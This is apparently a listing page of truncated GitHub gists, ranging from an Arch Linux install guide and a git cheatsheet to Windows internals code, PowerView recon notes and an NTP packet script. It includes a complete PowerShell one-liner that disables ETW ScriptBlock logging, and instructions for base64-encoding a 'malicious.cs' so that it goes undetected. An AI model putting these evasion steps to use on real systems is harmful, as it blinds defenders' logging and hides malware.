mattiaslundberg

# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.

# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux

# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.

# Set swedish keymap

ccbrown

#include <stdio.h>

void DumpHex(const void* data, size_t size) {
	char ascii[17];
	size_t i, j;
	ascii[16] = '\0';
	for (i = 0; i < size; ++i) {
		printf("%02X ", ((unsigned char*)data)[i]);
		if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
			ascii[i % 16] = ((unsigned char*)data)[i];

Cr4sh

#include "stdafx.h"

#define DB(_val_) __asm __emit (_val_)

#define INVALID_SYSCALL (DWORD)(-1)

// code selectors
#define CS_32   0x23
#define CS_64   0x33

zmwangx

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

tothi

# git cheatsheet: some basic git instructions (w.i.p.)

# create bare repo for an existing source tree
git init --bare project.git
cd project.git

# edit exclude
edit info/exclude

# add files to bare repo

Dbof

import os
import sys
import time
from subprocess import Popen, DEVNULL
import datetime
from scapy.all import IP, UDP, NTP
from netfilterqueue import NetfilterQueue


def get_switch_ip():

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

lucasg

#include <windows.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <sal.h>
#include <assert.h>

#ifdef _X86_
#error "This snippet only build in 64-bit due to heavy use of uintptr arithmetics."
#endif

Arno0x

/*
Author: Arno0x0x, Twitter: @Arno0x0x

DO NOT COMPILE THIS SOURCE FILE !

Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64

Then paste it in the code in "not_detected.cs" source file

tandasat

#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
# 
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)